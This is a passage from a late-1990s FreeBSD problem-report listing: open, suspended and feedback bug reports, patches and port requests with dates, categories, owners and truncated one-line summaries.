i s [1995/11/20] kern/831 one minor complaint about the kernel visu s [1995/11/27] bin/841 stale nfs mounts cannot be umounted o [1995/11/30] bin/854 dg swapinfo shows incorrect information for a [1996/01/30] bin/981 fenner clnt_broadcast() is not aware of aliases s [1996/03/20] kern/1090 iostat displays incorrect sps count s [1996/03/20] bin/1093 route's diagnostic is weird o [1996/04/06] kern/1119 dg Mounted EXT2FS partition is not cleanly u s [1996/06/11] bin/1312 automounter hangs on boot s [1996/06/13] bin/1320 dump limits blocksize to 32K s [1996/07/07] bin/1375 jraynard Extraneous warning from mv(1) [PATCH] o [1996/07/24] misc/1428 ncurses doesn't always display ALTCHARSET s [1996/09/08] bin/1589 [PATCH] ftp fails to flush output o [1996/09/14] gnu/1611 phk groff should use "system-wide" papersize o [1996/09/23] i386/1671 joerg s2 map in pcvt isn't ISO 8859-1 and claim s [1996/10/13] misc/1791 syslimits.h does not allow overriding def o [1996/10/20] bin/1849 gdb sets library breakpoints on the wrong s [1996/10/24] bin/1881 file(1) misidentifies Sun3/m68k executabl s [1996/11/01] bin/1941 danny wtmp and monthly rotation s [1996/11/01] bin/1943 route(8) args s [1996/11/04] gnu/1961 [PATCH] uucp logging files are in /var/sp s [1996/11/06] bin/1970 csh limtail() bug s [1996/11/16] bin/2036 cpio size wraparound s [1996/11/19] bin/2061 DEBUG_FLAGS in bsd.lib.mk is broken s [1996/11/19] bin/2065 in tzsetup/sysinstall, allow user to type s [1996/11/22] bin/2090 clients may bind to FreeBSD ypserv refusi s [1996/11/28] bin/2119 [PATCH] mount lies to child about argv0, s [1996/12/02] bin/2137 vm statistics are bad s [1996/12/14] bin/2216 [PATCH] Ada specs not being compiled into o [1996/12/17] i386/2239 jmg some interrupts take too long (i.e. BT946 a [1996/12/21] bin/2265 guido su(1) does not call skeyaccess() o [1996/12/24] kern/2273 dufault support for POSIX.4 / POSIX.1a RT-schedul s [1996/12/27] kern/2298 Support for DSR/DCD swapping on serial po a [1996/12/27] misc/2302 brandon new crypt() including SHS and an extendab o [1996/12/29] bin/2315 peter tail segfaults on NFS permission denied s [1996/12/30] kern/2327 [PATCH] `Green' saver for pcvt o [1997/01/10] bin/2442 davidn setusershell()/endusershell() missing o [1997/01/14] kern/2492 AIMS Lab RadioTrack driver for FreeBSD 2. o [1997/01/26] i386/2598 ep0 in EISA mode hangs if ep0-device (ISA o [1997/01/28] bin/2603 dufault Added POSIX.4/POSIX.1b constants in unist o [1997/01/28] bin/2604 dufault Added POSIX.4/POSIX.1b shm_open()/shm_unl o [1997/02/02] gnu/2637 tar dumped core with -g option. a [1997/02/02] bin/2641 wpaul login_access.c doesn't work with NIS by d o [1997/02/05] bin/2668 modification suggested for rarpd o [1997/02/14] bin/2737 yppasswd fails to change password on a su o [1997/02/15] misc/2745 fenner PR querry web form doesn't sort correctly o [1997/03/03] kern/2857 DE500 board exhibits capture effect o [1997/03/03] kern/2865 peter NFS client hangs on umount, ls, df when N o [1997/03/06] docs/2897 steve send-pr categories should be explained so o [1997/03/06] bin/2898 fenner arp -a -n buglet o [1997/03/10] bin/2934 sh(1) has problems with $ENV o [1997/03/10] bin/2938 hoek Add -b, -l, and -f options to du(1) o [1997/03/18] misc/3024 make reinstall in /usr/src requires writa o [1997/03/22] kern/3061 route does not accept -genmask o [1997/03/31] gnu/3157 Patches to gas and gdb to support MMX ext o [1997/04/07] bin/3221 rpc.rusersd : can't communicate with SunO o [1997/04/07] misc/3225 [PATCH] uucpd.c should normalize host nam o [1997/04/08] misc/3237 SCRIPTS addition to bsd.prog.mk o [1997/04/09] bin/3242 incorrect prototype for initgroups o [1997/04/14] kern/3281 errors when "rm -r"-ing in a mounted ext2 o [1997/04/14] kern/3282 ext2fs causes fs-unmount at shutdown/rebo o [1997/04/14] bin/3284 [PATCH] symorder(1): -t option doesn´t wo o [1997/04/14] bin/3286 [PATCH] missing error checking in mount_m o [1997/04/14] kern/3287 [PATCH] missing symbols in /usr/src/sys/i o [1997/04/15] kern/3299 /dev/console hangs o [1997/04/17] bin/3314 [PATCH] /etc/daily did not run on April 6 o [1997/04/27] bin/3399 mv of symbolic link can move directory in o [1997/04/29] bin/3416 ibcs emulation problems o [1997/05/05] i386/3504 [PATCH] New features (and manpage) for ne o [1997/05/08] gnu/3552 the -L option of tar does not work proper s [1997/05/09] kern/3571 Mounted ext2 prevents umount of filesyste o [1997/05/12] kern/3584 luigi cleanup TCP_REASS macro in tcp_input.c o [1997/05/16] bin/3608 Telnet in linemode will break apart long o [1997/05/17] kern/3611 Internal CPU cache on CyrixiInstead DX2 d o [1997/05/20] docs/3645 torstenb TCP_wrappers package doesn't mention wher s [1997/05/21] bin/3648 roberto [PATCH] find(1) extension for file flags s [1997/05/22] kern/3667 [PATCH] make vn LKM'able. o [1997/06/02] bin/3762 dufault Bogus return values from rtprio(1) o [1997/06/07] bin/3805 single process tftpd o [1997/06/09] bin/3826 KerberosIV sometimes hangs rcp o [1997/06/10] bin/3837 dufault new feature for rtprio o [1997/06/12] kern/3853 luigi netboot/ns8390.c breaks NS datasheet o [1997/06/14] bin/3866 rcs2log fails with eastern timezones o [1997/06/15] kern/3879 peter Can't export mounted ext2fs via NFS o [1997/06/18] kern/3901 Multicast for Intel 10/100 Ethernet Card o [1997/06/19] misc/3912 ctags(1) cannot trace some macro correctl o [1997/06/24] kern/3944 if_le doesnt receive ether multicast pack o [1997/06/25] kern/3948 nonworking t/tcp server side a [1997/06/25] kern/3953 kern-config: options PANIC_REBOOT_WAIT_TI o [1997/06/26] i386/3962 print disk internal cache size during pro o [1997/06/27] kern/3968 Hardware probes die on Peak SBCs. o [1997/06/29] ports/3983 fenner New port: psf toolkit o [1997/07/07] kern/4051 pppd connect 'chat ...' broken s [1997/07/07] kern/4052 VJ compression drops packets with IP+TCP o [1997/07/18] bin/4116 davidn Kerberized login as .root fails to o [1997/07/23] kern/4153 New tcp initial send sequence number code s [1997/07/24] bin/4157 [PATCH] netstat atalk output should print s [1997/07/26] bin/4172 suggest reconnection option added to fetc s [1997/07/28] kern/4184 [PATCH] minor nits in sys/netatalk s [1997/07/31] bin/4204 [PATCH] ac printed wrong report about tty o [1997/08/04] conf/4229 Ethernet interface unreachable on bootup o [1997/08/06] bin/4238 chpass only occasionally works in conjunc o [1997/08/07] kern/4243 file locking doesn't work for pipe o [1997/08/07] bin/4247 modification to /etc/security for FreeBSD o [1997/08/08] misc/4249 wpaul ypchsh doesn't care about changing a user o [1997/08/12] misc/4285 SDL RISCom/N2 (ISA) o [1997/08/13] kern/4297 dufault SIGEV_NONE and SIGEV_SIGNAL go in signal. o [1997/08/13] i386/4300 msmith The initial timeout on open("/dev/lpt0".. o [1997/08/14] ports/4304 asami Recommendation re. Ports Collection o [1997/08/22] ports/4356 erich sudo shouldn't block signals in tgetpass( o [1997/08/29] kern/4413 No way to unmount a floppy that goes bad o [1997/08/29] bin/4419 man can display the same man page twice o [1997/08/29] bin/4420 find -exedir doesn't chdir for first entr o [1997/09/03] bin/4459 bde No prototype for moncontrol(3) and monsta o [1997/09/04] misc/4468 dlopen is not available from static execu o [1997/09/07] bin/4484 peter sendmail is barfing o [1997/09/13] kern/4528 processes hang if the mount_portal proces a [1997/09/14] i386/4538 sos byteswapped ATAPI id strings o [1997/09/14] bin/4545 f77 will only call `cc', no com-line opti s [1997/09/15] i386/4547 luigi asc.c and pcaudio.c should use selrecord o [1997/09/16] misc/4556 make can't build executable from single F o [1997/09/21] kern/4597 Patch to pass NPX status word in signal c o [1997/09/21] kern/4601 Contrib: userconfig patch to edit SCSI co o [1997/09/25] bin/4629 calendar doesn't print all dates sometime o [1997/09/28] misc/4646 Can't fixit with an NFS-mounted CD. o [1997/09/29] conf/4654 Need to do post-ifconfig commands o [1997/10/04] bin/4688 peter sys/utsname.h SYS_NMLN 32 too small o [1997/10/05] bin/4696 ping hangs on certain unresolvable hosts o [1997/10/05] bin/4697 make doesn't handle dependencies with for o [1997/10/15] gnu/4771 diff to correct misleading total bytes in o [1997/10/22] bin/4828 ypxfr makes false assumption about RPC ca o [1997/10/24] kern/4845 Boot complains about disk slices in FAT p o [1997/10/24] kern/4847 pccard stuff fails after running Win95 wi o [1997/11/01] bin/4915 peter NFS mounts to linux machine can hang syst o [1997/11/02] bin/4923 vi leaves the screen in standout mode o [1997/11/07] bin/4969 cdcontrol plays incorrect audio tracks in o [1997/11/08] bin/4975 quotaon while server very busy causes loc o [1997/11/10] kern/4997 DDB_UNATTENDED doesn't always work o [1997/11/11] kern/5009 ibcs2 emulation o [1997/11/11] kern/5011 rndcontrol -s 8 causes kernel panic o [1997/11/13] bin/5031 lpr does not remove original file if -s i o [1997/11/13] ports/5034 ache (tcsh) blocked write on named pipe sticks o [1997/11/14] kern/5040 Support for "SCSI-0" devices o [1997/11/14] kern/5048 Calling shutdown(fd,1) multiple times wil o [1997/11/15] kern/5059 peter mountd, nfsd, etc. fail when lp0 defined o [1997/11/15] kern/5060 Kernel doesn't compile with mss o [1997/11/20] kern/5108 pmap_release panics with 'freeing held pa o [1997/11/20] kern/5110 kernel crash & core in pmap_testbit durin o [1997/11/23] bin/5134 cdcontrol will eject a mounted CDROM o [1997/11/26] misc/5153 jkh release file checksums in wrong file s [1997/11/28] bin/5173 [PATCH] restore ought to deal with root s s [1997/11/30] i386/5182 bde [PATCH] A patch support high speed serial o [1997/12/09] bin/5263 sh bug (with example) s [1997/12/11] kern/5275 [PATCH] Added volume (barcode) support to o [1997/12/14] conf/5292 master.passwd -- /nonexistent vs. /sbin/n s [1997/12/14] bin/5296 slattach fails creating pidfile with ioct o [1997/12/22] kern/5362 peter mount incorrectly reports / as an NFS exp f [1997/12/30] i386/5398 silo overflows running o [1998/01/02] bin/5410 pkg_info options s [1998/01/03] bin/5419 [PATCH] timed rejects valid networks with o [1998/01/08] kern/5429 Ethernet collision during file transfers s [1998/01/08] bin/5444 [PATCH] ypserv uses wrong dns lookup orde o [1998/01/11] bin/5483 Login(1) clears utmp entry o [1998/01/15] kern/5502 nfsd process usage doesn't get accounted s [1998/01/16] kern/5510 sos [PATCH] Incomplete ATAPI diagnostic at bo o [1998/01/18] kern/5517 Recursive NULLFS mount causes ufs_ihashge s [1998/01/20] misc/5531 [SUBMISSION] new library function abs2rel s [1998/01/20] kern/5532 [PATCH] Dropped packet counts are inaccur o [1998/01/21] bin/5537 vi dumps core with dodgy exrc file o [1998/01/24] i386/5559 PC-Card joystick ports were not supported o [1998/01/26] kern/5577 bde Unnecessary disk I/O and noatime ffs fixe a [1998/01/28] bin/5591 Trouble with LD_PRELOAD environment varia o [1998/01/31] bin/5609 lpd cannot send long files to HP's JetDir a [1998/02/02] ports/5626 billf 'ldap' port eats all available CPU time o [1998/02/02] kern/5627 Tertiary/Quaternary IDE Ctlrs: A few kern f [1998/02/05] misc/5662 sysinstall generates short dev names for o [1998/02/06] bin/5666 ifconfig fails to add alias o [1998/02/06] kern/5672 Crash from scsi aborted command 'Overlapp o [1998/02/09] kern/5689 sysctl vm.vmmeter - bogus and unsupported o [1998/02/10] bin/5711 bin/cat code cleanup o [1998/02/10] bin/5712 /bin/chio code cleaup and option added o [1998/02/10] bin/5717 pw -D -g "" returns error o [1998/02/10] bin/5718 pkg_delete refuses to run as non-root o [1998/02/14] bin/5745 [PATCH] Add /usr/local/share/mk to defaul o [1998/02/14] bin/5746 bootparamd will not netboot sun 3 compute o [1998/02/14] bin/5747 ld.so error message o [1998/02/15] bin/5758 sys/resources.h doesn't include sys/time. o [1998/02/17] kern/5768 Shutdown aborts syncing, when sync isn't o [1998/02/18] i386/5784 ibcs2 emulation not handling ioctl(..FION o [1998/02/19] ports/5788 joerg pcemu harddisk-access fixes o [1998/02/19] kern/5789 wcd0 requires ATAPI_STATIC o [1998/02/19] kern/5795 Panic: "bremfree: removing a buffer when o [1998/02/20] misc/5803 "tab" function from "ee" not compatible w o [1998/02/25] gnu/5841 installmost or install (world) of tmac fa o [1998/02/25] bin/5847 Makeworld fails if CXXFLAGS is set. s [1998/02/25] misc/5855 /etc/services is out of date with IANA o [1998/02/26] bin/5857 non-functional lpr/lpr o [1998/02/26] kern/5863 Kernel support for sorted SHUTDOWN & SHUT o [1998/03/01] bin/5880 df -t does not support devfs o [1998/03/01] ports/5884 dburr New port: icqjava-0.981a (net/icqjava) o [1998/03/02] bin/5901 new version of `fmt' o [1998/03/03] bin/5912 kinit exits if no user name specified o [1998/03/06] kern/5931 dma errors in syslog with GUS-max o [1998/03/06] i386/5932 perfmon kernel code should check for non- o [1998/03/08] bin/5944 cvs doesn't work correct. o [1998/03/10] ports/5972 andreas x11/fvwm95 requiring gsm, and rplay is a o [1998/03/11] gnu/5982 no error exit code from tar on child fail o [1998/03/12] gnu/5992 cvs y2k o [1998/03/13] bin/6000 kadmin ank uses bad default expiration of o [1998/03/15] bin/6015 indent(1) breaks source with backslash ne o [1998/03/16] kern/6032 poor TCP performance using FDDI over long o [1998/03/18] misc/6060 peter Sendmail executable, not doing MASQUERADE o [1998/03/22] conf/6096 /sys/i386/conf/LINT: edit(???) sound_conf o [1998/03/22] gnu/6107 gdb should support PRINTF_HAS_LONG_LONG o [1998/03/28] bin/6156 Patches to make dump understand ENOSPC o [1998/03/28] bin/6161 2.2.6 kerberos servers are awfully visibl o [1998/03/29] ports/6170 peter another squid ports o [1998/03/30] ports/6181 andy New port: xoj-1.0 o [1998/03/31] bin/6183 quota hangups o [1998/03/31] kern/6184 No error if resulting file pos in lseek i o [1998/04/01] bin/6187 peter mounting nfs directories with -b can caus o [1998/04/03] bin/6202 No way to detect removable media. o [1998/04/03] bin/6206 Enhancements to the shutdown program o [1998/04/04] kern/6213 peter NFS-mounted swap (via vnconfig) easily cr o [1998/04/04] bin/6214 ping sometimes cannot be killed with a Co o [1998/04/05] conf/6220 Too few ttyv devices in the -RELEASE syst s [1998/04/06] bin/6223 PST/DST bug in /bin/date o [1998/04/06] ports/6230 rse gfont_mkgdf calls wrong interpreter o [1998/04/06] bin/6234 ypserv -d is broken f [1998/04/07] kern/6247 Gravis UltraSound Classic no longer works o [1998/04/14] kern/6296 IP_HDRINCL sockets force header fields to a [1998/04/14] kern/6299 vmstat -i does not show PnP device interr s [1998/04/15] bin/6314 [PATCH] /usr/sbin/ac modification s [1998/04/16] ports/6315 kuriyama new port request: korean/htm o [1998/04/16] kern/6318 pppd does not update wtmp on hangup o [1998/04/16] misc/6320 Sometimes nohup isn't good enough. o [1998/04/17] bin/6332 bde /usr/include/time.h doesn't compile with o [1998/04/17] gnu/6338 Gnu tar not working properly with the -G o [1998/04/18] conf/6346 Kernel version strings need to relate to o [1998/04/20] bin/6359 routed does sent router discovry solicita s [1998/04/20] bin/6371 [PATCH?] fetch(1) uses HTTP_PROXY for ftp a [1998/04/27] kern/6432 IFF_NOARP does not affect ethernet interf o [1998/04/28] ports/6445 jkoshy New port: `fhist' o [1998/04/30] kern/6464 tcpdump doesn't recognize tun0 when it's o [1998/05/03] kern/6495 Need pci_unmap_mem and pci_unmap_port rou s [1998/05/04] bin/6509 [ALMOST PATCH] Allow dd to seek/skip to o s [1998/05/05] bin/6521 [MAYBE PATCH] "rmdir -p x/y/z/" fails o [1998/05/07] kern/6544 luigi Only get one channel through sound card o [1998/05/07] ports/6546 ache 3line ansi prompt in tcsh: cursor disappe o [1998/05/11] i386/6595 Old IP address persistent after change o [1998/05/12] misc/6612 bsd.man.mk can't handle man pages with ": o [1998/05/13] kern/6623 non-root user can crash system if disconn o [1998/05/13] conf/6624 davidn One class with nologin=/etc/nologin: reje o [1998/05/15] kern/6651 peter Possible NFS deadlock clue s [1998/05/16] bin/6658 [PATCH] -stable getcwd(3) performs unnece s [1998/05/17] kern/6668 [PATCH] new driver: Virtual Ethernet driv a [1998/05/26] misc/6759 phk buggy code in libdisk.a's disk.c o [1998/05/26] kern/6760 can't compile kernel w/o networking o [1998/05/26] kern/6769 peter panic: nfs rcvunlock s [1998/05/29] kern/6781 [PATCH] exabyte changer doesn't grok LUNs s [1998/05/29] bin/6785 place for all the default dump flags f [1998/05/31] ports/6813 fenner patched audio module for vat port o [1998/06/01] ports/6815 torstenb ssh lookup ignores second IP address o [1998/06/01] kern/6820 cd9660_mount NULL pointer deref for no CD o [1998/06/06] kern/6874 accounting prevents transition to multi u o [1998/06/13] misc/6936 sysinstall: install from MS-DOS MO divece o [1998/06/18] kern/6981 CD unmount w/o CD in drive can cause pani s [1998/06/19] bin/6995 [patch] Minor flaw in fdformat s [1998/06/19] bin/6997 [patch] vnconfig "open" error message con s [1998/06/21] kern/7014 [PATCH][STABLE] Add support for SiS 5591 o [1998/06/22] bin/7021 asami Size estimation patches to pkg_* o [1998/06/22] bin/7022 asami changes to bsd.port.mk to accompany PR bi o [1998/06/22] bin/7023 asami bsd.port.(%|subdir.).mk patches for size f [1998/06/23] kern/7029 gibbs cdrecord and aic7880 troubles f [1998/06/23] i386/7031 Our RocketPort port does not support DEVF s [1998/06/24] kern/7044 [PATCH] WaveLAN (2.4G, ISA, full-length b o [1998/06/25] docs/7065 wosch FreeBSD webpages -> applications, port br f [1998/06/25] bin/7068 markm /usr/bin/perl: library path addition s [1998/06/28] kern/7095 [stable] Gravis MAX in 2.2.6 suffers from s [1998/06/28] i386/7100 integrate pcvt configuration into the /et s [1998/07/01] bin/7136 kerberized telnetd doesn't use gettytab % s [1998/07/02] kern/7146 The PCCARD doesnt recognize cards in top s [1998/07/06] bin/7184 /usr/games/robots fails to write high sco s [1998/07/08] kern/7210 [PATCH] od(4) bug fixes and enhancements, s [1998/07/10] misc/7232 Suggestion for FreeBSD installation dialo o [1998/07/10] kern/7234 yokota keyboard problems during login immediatel f [1998/07/10] misc/7239 ping(8) and traceroute(8) may report erra o [1998/07/12] bin/7265 A warning flag is added to ln(1). o [1998/07/13] ports/7268 asami MASTER_SITE_OVERRIDE works more better o [1998/07/14] kern/7282 some old and rarely used drivers have app o [1998/07/14] ports/7283 ache tcsh / LC_CTYPE - obscure problem. o [1998/07/15] bin/7287 Incorrect domain name for MAP_UPDATE in m o [1998/07/16] bin/7298 Improvements to ln(1). a [1998/07/19] bin/7324 wosch Suggestions for minor modifications to ad o [1998/07/21] bin/7352 libc generates spurious warnings when use a [1998/07/23] ports/7375 dburr New port request: audio/xsplay f [1998/07/23] kern/7377 we have a new digiboard driver supporting s [1998/07/29] i386/7426 Bugs in macro definitions of pthreads. a [1998/07/31] docs/7456 doc dialog(3) man page outdated o [1998/08/01] ports/7464 dburr New port: WMakerconf o [1998/08/03] ports/7485 andy New port: Xterminal-0.2 s [1998/08/09] kern/7546 [PATCH] [STABLE ?]shutdown -p - system po f [1998/08/12] kern/7589 Tulip Driver parses SROM contents wrong f [1998/08/13] conf/7606 [PATCH] NIS Makefile.dist: NOPUSH replace o [1998/08/14] kern/7619 odd nfs server not responding messages ap o [1998/08/16] ports/7628 dburr new port: sajber-jukebox o [1998/08/16] bin/7632 Race condition in /stand/sysinstall f [1998/08/16] i386/7633 panic: page fault on install with boot.fl s [1998/08/18] bin/7669 libalias does not IRC DCC packets under c o [1998/08/19] ports/7680 billf New port of tn5250 o [1998/08/19] gnu/7687 description of default baud rate for cu c o [1998/08/20] kern/7693 Misleading warning in cblock_alloc_cblock o [1998/08/20] bin/7694 bogus error-message from route(8) o [1998/08/22] kern/7722 Changes to acct format o [1998/08/23] bin/7728 ftpd processes hang o [1998/08/27] bin/7753 arp command fails silently on invalid pro o [1998/08/28] misc/7771 Debugging putenv/getenv o [1998/08/29] ports/7774 torstenb sshd doesn't refuse to login people with o [1998/08/29] bin/7779 [PATCH] modload should detect stripped ke o [1998/08/30] kern/7782 Kernel rebuild not correctly responding t o [1998/08/30] bin/7786 quota.h has superfluous semicolon in macr o [1998/09/01] gnu/7800 tar(1) does not recognize --gunzip option o [1998/09/02] i386/7816 dfr [Patch] NE2000 PnP card IDs to sys/i386/i o [1998/09/03] bin/7826 ls(1) knows too much about format of strf o [1998/09/03] bin/7828 Add a command line option to cp to make i o [1998/09/05] kern/7837 patches to add a p_auth extension pointer o [1998/09/07] ports/7845 tg Unbuffered /dev/vx0-output from Python 1. o [1998/09/07] bin/7846 /sbin/mount_* do not canonicalize the mou o [1998/09/07] misc/7850 lt_LT.* locale o [1998/09/07] kern/7856 Patches to add lkm hooks to cmsg_data anc o [1998/09/08] bin/7860 Extra option to pr(1). s [1998/09/08] bin/7868 [almost patch]Morse Code Fixups o [1998/09/08] bin/7869 Improved error messages from apm o [1998/09/09] misc/7873 poor initial configuration and documentat o [1998/09/11] bin/7895 multiple identical NFS mounts accepted o [1998/09/11] kern/7903 unmatched '{}' blocks. o [1998/09/15] ports/7932 torstenb man zshall doesn't work o [1998/09/16] misc/7946 ccdconfig gives confusing error when give o [1998/09/17] bin/7962 /usr/bin/ee prompts "save changes" when f o [1998/09/18] bin/7973 lpd: Bad control file owner in case of re o [1998/09/19] kern/7990 patch - teach kernel about RB_POWEROFF fl o [1998/09/19] ports/7992 ports New port: xemacs20-stepwise (XEmacs20 hac o [1998/09/20] bin/7998 pkg_add seems to have unneeded umask o [1998/09/20] misc/8005 yokota Keyboard freezes going from KDE to text m o [1998/09/21] kern/8015 [patch] Some sysctl descriptions for the o [1998/09/24] ports/8042 torstenb If pidentd dies, you must kill all telnet o [1998/09/26] bin/8060 install ignores the +X mode flag o [1998/09/27] conf/8061 profiling utilities seperate from profili o [1998/09/27] ports/8063 asami [PATCH] Add multiple CDROM support to bsd o [1998/09/29] bin/8084 NIT: non-working code in rshd o [1998/10/02] i386/8131 [patch] Support for PCI NE2000 compatible o [1998/10/03] misc/8133 markm [patch] bug in telnetd (Kerberos IV) o [1998/10/03] bin/8134 End of game is not recognised immediately o [1998/10/03] misc/8139 [patch] missing /usr/src/share/examples/d o [1998/10/04] bin/8142 freebsd 2.2.7 implementation of key(1) [s o [1998/10/04] i386/8146 [patch] kzipboot serial console setup and a [1998/10/06] bin/8163 [patch] It is impossible to assign quotas o [1998/10/06] i386/8171 [patch] Intel EtherExpress Pro 100 suppor o [1998/10/07] misc/8202 semop() is not wrapped for thread safety o [1998/10/08] bin/8211 Script to search kernel for an address o [1998/10/12] bin/8295 order of options in printcap causes some o [1998/10/13] conf/8303 3.0-981009-BETA can't make swap device on o [1998/10/13] kern/8311 kernel panic on de0 o [1998/10/16] misc/8346 Strftime can't generate ISO-8601 timezone o [1998/10/16] bin/8347 /usr/lib/compat build issues in 3.0 RELEA o [1998/10/16] kern/8349 [PATCH] Changer definition for SureStore f [1998/10/17] misc/8357 Segmentation fault while making SWARM-1.3 o [1998/10/19] kern/8376 CLOCK_VIRTUAL not implemented o [1998/10/19] misc/8378 Is termcap not maintained enough ? o [1998/10/22] kern/8420 __getcwd() from an (forcibly) unmounted f o [1998/10/24] misc/8434 boot.flp /bin/init crashes during probe w o [1998/10/24] i386/8436 boot.flp sysinstall crashes when probing o [1998/10/24] bin/8438 ex/vi: Error: tcsetattr: Interrupted syst o [1998/10/25] kern/8444 hm pcvt with more than 8 virtual consoles o [1998/10/25] docs/8445 doc Update of "Installing Mathematica on Free o [1998/10/27] i386/8474 repquota does not pick up NIS information o [1998/10/28] bin/8479 Final \'s in /etc/exports did not work in o [1998/10/30] kern/8498 Race condition between unp_gc() and accep o [1998/10/30] bin/8501 snake has a segmentation fault depending o [1998/10/30] conf/8517 rc.conf/rc fails to set ldconfig -aout o [1998/10/31] misc/8519 Murphy's Laws o [1998/11/01] conf/8531 sysinstall on 3.0-RELEASE (and 3.0-curren o [1998/11/03] bin/8553 /usr/libexec/mail.local doesn't handle "> o [1998/11/04] i386/8571 Bug in config utility in FreeBSD 2.2.6-RE o [1998/11/07] kern/8589 incorrect spelling for "dependency" and " o [1998/11/07] i386/8598 MAKEDEV fails if not run from current dir o [1998/11/08] kern/8604 ps u gets confused about process start ti o [1998/11/08] kern/8605 ipsec for ipv4, new version o [1998/11/08] ports/8620 asami New option to colorls - -K, color only to o [1998/11/09] bin/8631 pci interrupts are shown on EISA only mac o [1998/11/09] kern/8633 TCP packet via SLIP/CSLIP containing this s [1998/11/12] kern/8661 stb sys/netatalk/at_control.c needs to correc o [1998/11/12] bin/8666 X blocks serial port with getty process o o [1998/11/13] gnu/8679 tar man page should be updated o [1998/11/14] bin/8681 other macro name that has same number is o [1998/11/18] ports/8754 se KDE: KDM Display Manager has login proble o [1998/11/18] bin/8756 'pw' command additional feature request o [1998/11/19] misc/8764 pwd_mkdb is slow on many users o [1998/11/19] docs/8765 dwhite some suggested text for describing passwo o [1998/11/22] bin/8809 fdisk calls QNX-4 partitions unknown o [1998/11/22] bin/8811 Problem to use 'NLSMODE' variable in Make a [1998/11/25] ports/8864 ports useradd - system V compatible implementat o [1998/11/27] i386/8867 /stand/sysinstall core dumps (signal 11) o [1998/11/29] kern/8895 DEC 21152 PCI-PCI bridge chip isn't probe o [1998/11/29] kern/8898 PCI devices without an associated driver o [1998/11/30] bin/8913 negative time values for csh 'time' built o [1998/12/01] i386/8923 ctm 2.2.5 -> 2.2.7 error hu_HU.ISO_8859- o [1998/12/01] kern/8925 options kern file needs AWE_DEFAULT_MEM_S o [1998/12/03] i386/8953 BINFORMAT not defined in 2.2-STABLE o [1998/12/03] bin/8955 request CVS allow advisory locks on repos o [1998/12/06] misc/8986 install-info breaks installworld over nfs o [1998/12/06] bin/8989 (patch) chflags support for mtree(8) o [1998/12/08] bin/9012 route add -host hostIP -interface localIP o [1998/12/10] conf/9051 2.2.8R boot floppy won't write to fixit f o [1998/12/11] bin/9055 When used without arguments, ``set'' and a [1998/12/12] bin/9064 n_hibma [PATCH] propose adding `direct' option in o [1998/12/14] bin/9078 tunefs cant access mounted devices (vs. m o [1998/12/15] kern/9092 DELF raid volumes cause panics under CAM o [1998/12/16] i386/9102 Voxware does not provide /dev/mixer for E o [1998/12/16] ports/9107 asami Addition to bsd.port.mk for searching mul o [1998/12/17] bin/9118 default install of aout compat libs is in o [1998/12/18] bin/9123 pax can't read tar archives that contain o [1998/12/20] kern/9144 luigi acd driver inconsistency (byte order in C o [1998/12/21] conf/9160 /etc/services file corruption o [1998/12/22] bin/9176 dillon placemark to split mount_ufs out of mount o [1998/12/23] kern/9183 newton chroot(2) can be broken by the superuser. o [1998/12/24] bin/9188 telnet gets stuck in ttydrain() o [1998/12/27] bin/9206 sysinstall installation should create /st f [1998/12/28] misc/9220 nvi: catalog: mistake in Russian error me o [1998/12/28] bin/9226 telnetd can log wrong IP address to utmp o [1998/12/29] bin/9233 gmp's mpq_add and mpq_sub are buggy o [1998/12/30] conf/9245 obsolete locale setting in /usr/src/etc/{ o [1998/12/30] conf/9246 allscreens_flags in /etc/rc.conf not work o [1998/12/30] bin/9250 [PATCH] allow fetch to do ftp directory l o [1998/12/31] i386/9257 fpathconf() missing from libc_r o [1998/12/31] bin/9259 allow no prompt for yes in fdformat, but o [1999/01/02] bin/9281 awk asumes memory that is returned from m o [1999/01/03] ports/9286 andreas Patch for games/nethack-qt to fix compila o [1999/01/03] ports/9289 kris New Port - ASPostit (Dockable version of o [1999/01/04] kern/9316 Intel PILA8461 NIC panics 2.2.7 during pr o [1999/01/04] bin/9318 vgrind(1): no JAVA support o [1999/01/04] i386/9319 D-Link DE-528CT poor performance o [1999/01/05] bin/9333 timestamp dump's progress o [1999/01/05] i386/9341 tty-level buffer overflows o [1999/01/06] docs/9352 hoek wrong macro names in groff_[ms|mm|mmse].7 o [1999/01/07] bin/9374 Improved functionality for find(1) o [1999/01/08] conf/9388 magic(5) correction for wordperfect o [1999/01/08] kern/9392 Alternate system clock OR kernel stats cl f [1999/01/10] ports/9425 se KDE starting up from xdm has problem.... o [1999/01/13] bin/9470 aout-to-elf-build broken with kerberosIV- o [1999/01/13] kern/9474 "comcontrol rescan 0:8:0" hangs, causes o o [1999/01/14] bin/9494 new option to prevent mail from sending m o [1999/01/16] bin/9529 ftp filname completion can't handle space o [1999/01/17] bin/9536 make world installs aout compat libs in t o [1999/01/19] bin/9569 top(1) ignores tty EOF condition. o [1999/01/19] kern/9570 ed(4) irq config enhancement o [1999/01/19] bin/9573 ksrvtgt not working o [1999/01/20] misc/9582 configApache command doesn't work for /st o [1999/01/20] kern/9590 Clean up for -Wall warnings o [1999/01/21] kern/9611 MFS calculates the size incorrectly when o [1999/01/22] kern/9619 Restarting mountd kills existing mounts o [1999/01/25] kern/9679 fix for uninterruptible open in portal fi o [1999/01/25] kern/9689 panic in sbdrop(kern/uipc_socket2.c) o [1999/01/26] bin/9711 Fails: cd /usr/bin; gzip file ; mv file. o [1999/01/27] i386/9721 Patch for FreeBSD netboot (booting via DO o [1999/01/28] kern/9748 error in queue handling of at_shutdown() o [1999/01/28] bin/9770 An openpty(3) auxiliary program o [1999/01/29] i386/9777 luigi Generic AD1816 sound suport in Luigi's pc o [1999/01/29] misc/9778 Need to handle conflicting pthread.h and o [1999/01/29] ports/9786 cwt tk80 port doesn't create man page links o [1999/01/30] kern/9791 enhancement for netinet/ip_icmp.c to cont o [1999/01/30] ports/9792 msmith pib coredumps in port maker mode o [1999/01/30] ports/9795 obrien The Handbook is not clear on how to deal o [1999/01/30] bin/9809 finger output format wrong f [1999/01/30] ports/9811 nectar New port: lang/gnomeguile o [1999/01/30] ports/9812 nectar New port: devel/libgtopbindings o [1999/01/31] ports/9840 asami patch allows ports to fetch their sources o [1999/01/31] conf/9845 Propose adding options to rc.conf and rc. o [1999/01/31] kern/9848 ARP proxyall extra sanity check o [1999/02/01] bin/9868 Patch to add "date -a" o [1999/02/01] kern/9869 When using macros out of function, they s o [1999/02/01] conf/9874 idle-timeout facilities in /etc/login.con o [1999/02/03] bin/9893 NFS umount of regular file impossible o [1999/02/03] bin/9902 error in german (and some other) locale s o [1999/02/05] ports/9921 peter exmh2 ports update o 